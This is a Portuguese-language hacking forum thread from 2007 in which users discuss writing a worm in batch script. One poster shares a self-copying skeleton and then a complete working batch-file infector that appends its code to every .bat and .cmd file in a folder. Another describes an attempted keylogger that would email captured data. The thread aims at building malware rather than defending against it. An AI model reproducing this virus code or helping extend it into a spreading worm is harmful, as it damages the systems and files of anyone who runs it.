worm em batch

Started by script, 10 de March , 2007, 05:14:21 PM

Previous topic - Next topic

0 Members and 1 Guest are viewing this topic.

script

olá pessoal sou novo aki!

gostaria de saber se é possível criar um worm em batch

Mental_Way

O que é um worm?!

Um Worm em computação é um programa auto-replicante, semelhante a um vírus. O vírus infecta um programa e necessita deste programa hospedeiro para se propagar, o worm é um programa completo e não precisa de outro programa para se propagar.

Com essa explicação simplês do que é o worm, e conheçendo a programação Batch:
Teoricamente é possivel a criação de um worm em Batch...

Sem +...
[RitualistaS GrouP]

"Aquele que sabe pouco rapidamente revela isto."

script

pode ateh ser possível mas, tem que usar um vbs de auxílio neh?

1NT3RC3PT0R

Quote from: "script"pode ateh ser possível mas, tem que usar um vbs de auxílio neh?

A grande maioria usa vbs, mas não é necessario para todo tipo de worm, primeiro você deve ter em mente oque o seu worm vai fazer na maquina, como será a forma de propagação dele, ai você vai ter que ver se é possivel fazer o que você quer somente em batch, ou vai precisar do auxílio de vbs.

Se você tem um projeto em mente, poste ele ai pra nos vermos e te ajudar, quem sabe não sai um projeto bacana.

Anonymous

Possivel é, mas há limitações...

script

tipo assim ó cara:
é soh o esqueleto od programa:

@echo off
Break off
cls
copy /y %0 %Temp%\worm.cmd
depois aki eu queria colocar umas funçõezinhas pra enviar um e-mail com anexo
cls

quanto mais pequeno melhor

script

eu vi esse vírus do guguinha, tmb serve pra dar uma estudada?

@echo off%DAMASCO%
if -%1==-DAMASCO goto DAMASCOz
find "DAMASCO"<%0>DAMASCO.bat
echo.>>DAMASCO.bat
for %%b in (*.bat *.cmd) do call DAMASCO.bat DAMASCO %%b
erase DAMASCO.bat
goto DAMASCO
:DAMASCOz
find "DAMASCO"<%2>nul
if errorlevel 1 ( type %2>>DAMASCO.bat & erase %2 & ren DAMASCO.bat %2 )
:DAMASCO
%DAMASCO%cls

1NT3RC3PT0R

Script Alguns meses atraz, eu estava tentando fazer uma especie de KeyLoger em batch, mas não obtive bons resultados, pois é impossivel capturar o que é digitado no teclado, somente por batch. Bom, ele ia mandar os arquivos por email, para isso eu estava tendo como base um texto aqui no forum do Dark_Side sobre como enviar email pelo pop3 , que você pode ver Aqui. E se eu não me engano, tinha mais um texto do _Dr4k0_ só que este eu não consegui achar.

Eu tenho uns sources em vbs aqui, mas eles usam o outlook para enviar o email, e como todos devem saber, o outlook tem q ter uma conta de email configurada (coisa dificil de se ver hoje, pois são poucos mesmo que usam esta ferramenta ainda) para poder mandar um email, sem falar que ele da um bélo dum aviso na tela, de que tem um outro programa tentando enviar um email escondido pelo outlook.

Vo procurar eles aqui, quem sabe eles podem te ajudar em algo, apesar de eu não recomendar o uso deles.

script

e worm pra msn em batch é possível!